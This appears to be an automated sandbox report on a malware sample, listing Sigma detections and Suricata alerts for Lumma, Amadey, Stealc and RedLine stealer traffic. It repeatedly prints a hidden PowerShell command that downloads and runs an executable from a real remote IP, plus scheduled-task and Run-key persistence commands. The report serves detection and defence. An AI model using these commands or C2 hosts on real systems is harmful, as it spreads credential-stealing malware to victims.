Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 4536, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\376bb929a5.exe

Sigma detected: PowerShell DownloadFile

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'X13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'X13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\m5569IMo3.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7748, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'X13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, ProcessId: 7900, ProcessName: powershell.exe

Sigma detected: Script Interpreter Execution From Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: mshta C:\Users\user\AppData\Local\Temp\m5569IMo3.hta, CommandLine: mshta C:\Users\user\AppData\Local\Temp\m5569IMo3.hta, CommandLine|base64offset|contains: m, Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: "C:\Users\user\Desktop\random.exe", ParentImage: C:\Users\user\Desktop\random.exe, ParentProcessId: 7720, ParentProcessName: random.exe, ProcessCommandLine: mshta C:\Users\user\AppData\Local\Temp\m5569IMo3.hta, ProcessId: 7748, ProcessName: mshta.exe

Sigma detected: Suspicious MSHTA Child Process

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'X13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'X13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\m5569IMo3.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7748, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'X13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, ProcessId: 7900, ProcessName: powershell.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: mshta C:\Users\user\AppData\Local\Temp\m5569IMo3.hta, CommandLine: mshta C:\Users\user\AppData\Local\Temp\m5569IMo3.hta, CommandLine|base64offset|contains: m, Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: "C:\Users\user\Desktop\random.exe", ParentImage: C:\Users\user\Desktop\random.exe, ParentProcessId: 7720, ParentProcessName: random.exe, ProcessCommandLine: mshta C:\Users\user\AppData\Local\Temp\m5569IMo3.hta, ProcessId: 7748, ProcessName: mshta.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 4536, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\376bb929a5.exe

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7900, TargetFilename: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE

Sigma detected: PowerShell Download Pattern

Source: Process started

Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'X13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'X13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\m5569IMo3.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7748, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'X13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, ProcessId: 7900, ProcessName: powershell.exe

Sigma detected: PowerShell Web Download

Source: Process started

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: schtasks /create /tn ajDhEmaEm2d /tr "mshta C:\Users\user\AppData\Local\Temp\m5569IMo3.hta" /sc minute /mo 25 /ru "user" /f, CommandLine: schtasks /create /tn ajDhEmaEm2d /tr "mshta C:\Users\user\AppData\Local\Temp\m5569IMo3.hta" /sc minute /mo 25 /ru "user" /f, CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn ajDhEmaEm2d /tr "mshta C:\Users\user\AppData\Local\Temp\m5569IMo3.hta" /sc minute /mo 25 /ru "user" /f, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7740, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn ajDhEmaEm2d /tr "mshta C:\Users\user\AppData\Local\Temp\m5569IMo3.hta" /sc minute /mo 25 /ru "user" /f, ProcessId: 7844, ProcessName: schtasks.exe

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'X13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'X13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\m5569IMo3.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7748, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'X13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, ProcessId: 7900, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'X13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'X13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\m5569IMo3.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7748, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'X13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, ProcessId: 7900, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 2152, ProcessName: svchost.exe

Data Obfuscation

Sigma detected: Powershell download and execute file

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'X13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'X13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\m5569IMo3.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7748, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'X13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, ProcessId: 7900, ProcessName: powershell.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-07T17:59:25.911379+0100	2028371	3	Unknown Traffic	192.168.2.8	49720	104.21.0.135	443	TCP
2025-02-07T17:59:27.312352+0100	2028371	3	Unknown Traffic	192.168.2.8	49723	104.21.0.135	443	TCP
2025-02-07T17:59:28.976511+0100	2028371	3	Unknown Traffic	192.168.2.8	49725	104.21.0.135	443	TCP
2025-02-07T17:59:32.000569+0100	2028371	3	Unknown Traffic	192.168.2.8	49726	104.21.0.135	443	TCP
2025-02-07T17:59:33.053409+0100	2028371	3	Unknown Traffic	192.168.2.8	49728	188.114.96.3	443	TCP
2025-02-07T17:59:33.689370+0100	2028371	3	Unknown Traffic	192.168.2.8	49730	188.114.96.3	443	TCP
2025-02-07T17:59:33.969236+0100	2028371	3	Unknown Traffic	192.168.2.8	49731	104.21.0.135	443	TCP
2025-02-07T17:59:38.611672+0100	2028371	3	Unknown Traffic	192.168.2.8	49733	188.114.96.3	443	TCP
2025-02-07T17:59:39.181479+0100	2028371	3	Unknown Traffic	192.168.2.8	49735	104.21.0.135	443	TCP
2025-02-07T17:59:41.102712+0100	2028371	3	Unknown Traffic	192.168.2.8	49738	188.114.96.3	443	TCP
2025-02-07T17:59:43.890614+0100	2028371	3	Unknown Traffic	192.168.2.8	49741	104.21.0.135	443	TCP
2025-02-07T17:59:44.074015+0100	2028371	3	Unknown Traffic	192.168.2.8	49742	188.114.96.3	443	TCP
2025-02-07T17:59:46.607999+0100	2028371	3	Unknown Traffic	192.168.2.8	49743	104.21.0.135	443	TCP
2025-02-07T17:59:48.295843+0100	2028371	3	Unknown Traffic	192.168.2.8	49745	188.114.96.3	443	TCP
2025-02-07T17:59:49.382823+0100	2028371	3	Unknown Traffic	192.168.2.8	49747	188.114.96.3	443	TCP
2025-02-07T17:59:53.380021+0100	2028371	3	Unknown Traffic	192.168.2.8	49749	188.114.96.3	443	TCP
2025-02-07T17:59:54.957366+0100	2028371	3	Unknown Traffic	192.168.2.8	49750	188.114.96.3	443	TCP
2025-02-07T18:00:00.232953+0100	2028371	3	Unknown Traffic	192.168.2.8	49759	188.114.96.3	443	TCP
2025-02-07T18:00:03.065274+0100	2028371	3	Unknown Traffic	192.168.2.8	49761	188.114.97.3	443	TCP
2025-02-07T18:00:04.419284+0100	2028371	3	Unknown Traffic	192.168.2.8	49763	188.114.97.3	443	TCP
2025-02-07T18:00:05.459409+0100	2028371	3	Unknown Traffic	192.168.2.8	49766	188.114.96.3	443	TCP
2025-02-07T18:00:07.271451+0100	2028371	3	Unknown Traffic	192.168.2.8	49772	188.114.97.3	443	TCP
2025-02-07T18:00:07.991184+0100	2028371	3	Unknown Traffic	192.168.2.8	49773	188.114.96.3	443	TCP
2025-02-07T18:00:10.304423+0100	2028371	3	Unknown Traffic	192.168.2.8	49780	188.114.97.3	443	TCP
2025-02-07T18:00:12.199814+0100	2028371	3	Unknown Traffic	192.168.2.8	49783	188.114.97.3	443	TCP
2025-02-07T18:00:14.435924+0100	2028371	3	Unknown Traffic	192.168.2.8	49789	188.114.97.3	443	TCP
2025-02-07T18:00:14.435987+0100	2028371	3	Unknown Traffic	192.168.2.8	49788	188.114.96.3	443	TCP
2025-02-07T18:00:17.003993+0100	2028371	3	Unknown Traffic	192.168.2.8	49793	188.114.97.3	443	TCP
2025-02-07T18:00:19.522140+0100	2028371	3	Unknown Traffic	192.168.2.8	49799	188.114.97.3	443	TCP
2025-02-07T18:00:22.786837+0100	2028371	3	Unknown Traffic	192.168.2.8	49803	188.114.96.3	443	TCP
2025-02-07T18:00:22.795943+0100	2028371	3	Unknown Traffic	192.168.2.8	49804	188.114.96.3	443	TCP
2025-02-07T18:00:23.414842+0100	2028371	3	Unknown Traffic	192.168.2.8	49805	188.114.96.3	443	TCP
2025-02-07T18:00:25.174001+0100	2028371	3	Unknown Traffic	192.168.2.8	49808	188.114.96.3	443	TCP
2025-02-07T18:00:26.350841+0100	2028371	3	Unknown Traffic	192.168.2.8	49811	188.114.96.3	443	TCP
2025-02-07T18:00:27.294142+0100	2028371	3	Unknown Traffic	192.168.2.8	49812	188.114.96.3	443	TCP
2025-02-07T18:00:27.694085+0100	2028371	3	Unknown Traffic	192.168.2.8	49813	188.114.96.3	443	TCP
2025-02-07T18:00:30.253761+0100	2028371	3	Unknown Traffic	192.168.2.8	49825	188.114.96.3	443	TCP
2025-02-07T18:00:30.318058+0100	2028371	3	Unknown Traffic	192.168.2.8	49828	188.114.96.3	443	TCP
2025-02-07T18:00:32.056475+0100	2028371	3	Unknown Traffic	192.168.2.8	49852	188.114.96.3	443	TCP
2025-02-07T18:00:33.289754+0100	2028371	3	Unknown Traffic	192.168.2.8	49854	188.114.96.3	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-07T17:59:26.112686+0100	2054653	1	A Network Trojan was detected	192.168.2.8	49720	104.21.0.135	443	TCP
2025-02-07T17:59:27.783286+0100	2054653	1	A Network Trojan was detected	192.168.2.8	49723	104.21.0.135	443	TCP
2025-02-07T17:59:33.208489+0100	2054653	1	A Network Trojan was detected	192.168.2.8	49728	188.114.96.3	443	TCP
2025-02-07T17:59:34.185890+0100	2054653	1	A Network Trojan was detected	192.168.2.8	49730	188.114.96.3	443	TCP
2025-02-07T17:59:47.170323+0100	2054653	1	A Network Trojan was detected	192.168.2.8	49743	104.21.0.135	443	TCP
2025-02-07T17:59:48.874442+0100	2054653	1	A Network Trojan was detected	192.168.2.8	49745	188.114.96.3	443	TCP
2025-02-07T17:59:49.866430+0100	2054653	1	A Network Trojan was detected	192.168.2.8	49747	188.114.96.3	443	TCP
2025-02-07T18:00:03.463036+0100	2054653	1	A Network Trojan was detected	192.168.2.8	49761	188.114.97.3	443	TCP
2025-02-07T18:00:05.268910+0100	2054653	1	A Network Trojan was detected	192.168.2.8	49763	188.114.97.3	443	TCP
2025-02-07T18:00:15.239651+0100	2054653	1	A Network Trojan was detected	192.168.2.8	49788	188.114.96.3	443	TCP
2025-02-07T18:00:20.003427+0100	2054653	1	A Network Trojan was detected	192.168.2.8	49799	188.114.97.3	443	TCP
2025-02-07T18:00:22.927556+0100	2054653	1	A Network Trojan was detected	192.168.2.8	49804	188.114.96.3	443	TCP
2025-02-07T18:00:24.231589+0100	2054653	1	A Network Trojan was detected	192.168.2.8	49805	188.114.96.3	443	TCP
2025-02-07T18:00:30.784643+0100	2054653	1	A Network Trojan was detected	192.168.2.8	49828	188.114.96.3	443	TCP
2025-02-07T18:00:33.787356+0100	2054653	1	A Network Trojan was detected	192.168.2.8	49854	188.114.96.3	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-07T17:59:26.112686+0100	2049836	1	A Network Trojan was detected	192.168.2.8	49720	104.21.0.135	443	TCP
2025-02-07T17:59:33.208489+0100	2049836	1	A Network Trojan was detected	192.168.2.8	49728	188.114.96.3	443	TCP
2025-02-07T17:59:48.874442+0100	2049836	1	A Network Trojan was detected	192.168.2.8	49745	188.114.96.3	443	TCP
2025-02-07T18:00:03.463036+0100	2049836	1	A Network Trojan was detected	192.168.2.8	49761	188.114.97.3	443	TCP
2025-02-07T18:00:22.927556+0100	2049836	1	A Network Trojan was detected	192.168.2.8	49804	188.114.96.3	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-07T17:59:27.783286+0100	2049812	1	A Network Trojan was detected	192.168.2.8	49723	104.21.0.135	443	TCP
2025-02-07T17:59:34.185890+0100	2049812	1	A Network Trojan was detected	192.168.2.8	49730	188.114.96.3	443	TCP
2025-02-07T17:59:49.866430+0100	2049812	1	A Network Trojan was detected	192.168.2.8	49747	188.114.96.3	443	TCP
2025-02-07T18:00:05.268910+0100	2049812	1	A Network Trojan was detected	192.168.2.8	49763	188.114.97.3	443	TCP
2025-02-07T18:00:24.231589+0100	2049812	1	A Network Trojan was detected	192.168.2.8	49805	188.114.96.3	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (paleboreei .biz in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-07T18:00:03.065274+0100	2059926	1	Domain Observed Used for C2 Detected	192.168.2.8	49761	188.114.97.3	443	TCP
2025-02-07T18:00:04.419284+0100	2059926	1	Domain Observed Used for C2 Detected	192.168.2.8	49763	188.114.97.3	443	TCP
2025-02-07T18:00:07.271451+0100	2059926	1	Domain Observed Used for C2 Detected	192.168.2.8	49772	188.114.97.3	443	TCP
2025-02-07T18:00:10.304423+0100	2059926	1	Domain Observed Used for C2 Detected	192.168.2.8	49780	188.114.97.3	443	TCP
2025-02-07T18:00:12.199814+0100	2059926	1	Domain Observed Used for C2 Detected	192.168.2.8	49783	188.114.97.3	443	TCP
2025-02-07T18:00:14.435924+0100	2059926	1	Domain Observed Used for C2 Detected	192.168.2.8	49789	188.114.97.3	443	TCP
2025-02-07T18:00:17.003993+0100	2059926	1	Domain Observed Used for C2 Detected	192.168.2.8	49793	188.114.97.3	443	TCP
2025-02-07T18:00:19.522140+0100	2059926	1	Domain Observed Used for C2 Detected	192.168.2.8	49799	188.114.97.3	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-07T17:59:25.911379+0100	2059928	1	Domain Observed Used for C2 Detected	192.168.2.8	49720	104.21.0.135	443	TCP
2025-02-07T17:59:27.312352+0100	2059928	1	Domain Observed Used for C2 Detected	192.168.2.8	49723	104.21.0.135	443	TCP
2025-02-07T17:59:28.976511+0100	2059928	1	Domain Observed Used for C2 Detected	192.168.2.8	49725	104.21.0.135	443	TCP
2025-02-07T17:59:32.000569+0100	2059928	1	Domain Observed Used for C2 Detected	192.168.2.8	49726	104.21.0.135	443	TCP
2025-02-07T17:59:33.969236+0100	2059928	1	Domain Observed Used for C2 Detected	192.168.2.8	49731	104.21.0.135	443	TCP
2025-02-07T17:59:39.181479+0100	2059928	1	Domain Observed Used for C2 Detected	192.168.2.8	49735	104.21.0.135	443	TCP
2025-02-07T17:59:43.890614+0100	2059928	1	Domain Observed Used for C2 Detected	192.168.2.8	49741	104.21.0.135	443	TCP
2025-02-07T17:59:46.607999+0100	2059928	1	Domain Observed Used for C2 Detected	192.168.2.8	49743	104.21.0.135	443	TCP

ET MALWARE RedLine Stealer - CheckConnect Response

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-07T17:59:38.161508+0100	2045000	1	Malware Command and Control Activity Detected	103.84.89.222	33791	192.168.2.8	49724	TCP

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-07T17:59:21.249339+0100	2044696	1	A Network Trojan was detected	192.168.2.8	49718	185.215.113.43	80	TCP
2025-02-07T17:59:26.577616+0100	2044696	1	A Network Trojan was detected	192.168.2.8	49721	185.215.113.43	80	TCP
2025-02-07T17:59:32.557916+0100	2044696	1	A Network Trojan was detected	192.168.2.8	49727	185.215.113.43	80	TCP
2025-02-07T17:59:38.212011+0100	2044696	1	A Network Trojan was detected	192.168.2.8	49732	185.215.113.43	80	TCP
2025-02-07T17:59:43.340728+0100	2044696	1	A Network Trojan was detected	192.168.2.8	49739	185.215.113.43	80	TCP
2025-02-07T17:59:48.237912+0100	2044696	1	A Network Trojan was detected	192.168.2.8	49744	185.215.113.43	80	TCP
2025-02-07T17:59:58.743331+0100	2044696	1	A Network Trojan was detected	192.168.2.8	49753	185.215.113.43	80	TCP
2025-02-07T18:00:03.929191+0100	2044696	1	A Network Trojan was detected	192.168.2.8	49762	185.215.113.43	80	TCP

ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-07T18:00:06.585175+0100	2045001	1	Malware Command and Control Activity Detected	103.84.89.222	33791	192.168.2.8	49724	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (paleboreei .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-07T18:00:02.527277+0100	2059925	1	Domain Observed Used for C2 Detected	192.168.2.8	52348	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rebeldettern .com)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-07T17:59:25.171283+0100	2059927	1	Domain Observed Used for C2 Detected	192.168.2.8	54349	1.1.1.1	53	UDP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-07T17:59:29.913882+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.8	49725	104.21.0.135	443	TCP
2025-02-07T17:59:41.704804+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.8	49738	188.114.96.3	443	TCP
2025-02-07T18:00:09.832141+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.8	49772	188.114.97.3	443	TCP
2025-02-07T18:00:23.574448+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.8	49803	188.114.96.3	443	TCP

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-07T17:59:41.679455+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.8	49737	185.215.113.115	80	TCP
2025-02-07T18:00:08.880344+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.8	49775	185.215.113.115	80	TCP
2025-02-07T18:00:26.842523+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.8	49809	185.215.113.115	80	TCP
2025-02-07T18:00:32.258833+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.8	49845	185.215.113.115	80	TCP
2025-02-07T18:00:35.513065+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.8	49858	185.215.113.115	80	TCP
2025-02-07T18:00:38.633034+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.8	49862	185.215.113.115	80	TCP

ETPRO MALWARE Amadey CnC Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-07T17:59:15.696145+0100	2856121	1	A Network Trojan was detected	192.168.2.8	49716	185.215.113.43	80	TCP

ETPRO MALWARE Amadey CnC Activity M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-07T17:59:04.654529+0100	2856147	1	A Network Trojan was detected	192.168.2.8	49711	185.215.113.43	80	TCP

ETPRO MALWARE Amadey CnC Response M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-07T17:59:14.942151+0100	2856122	1	A Network Trojan was detected	185.215.113.43	80	192.168.2.8	49712	TCP
2025-02-07T18:01:55.323685+0100	2856122	1	A Network Trojan was detected	185.215.113.43	80	192.168.2.8	49920	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-07T17:59:07.605933+0100	2803305	3	Unknown Traffic	192.168.2.8	49713	185.215.113.97	80	TCP
2025-02-07T17:59:16.425762+0100	2803305	3	Unknown Traffic	192.168.2.8	49717	185.215.113.97	80	TCP
2025-02-07T17:59:22.018739+0100	2803305	3	Unknown Traffic	192.168.2.8	49719	185.215.113.97	80	TCP
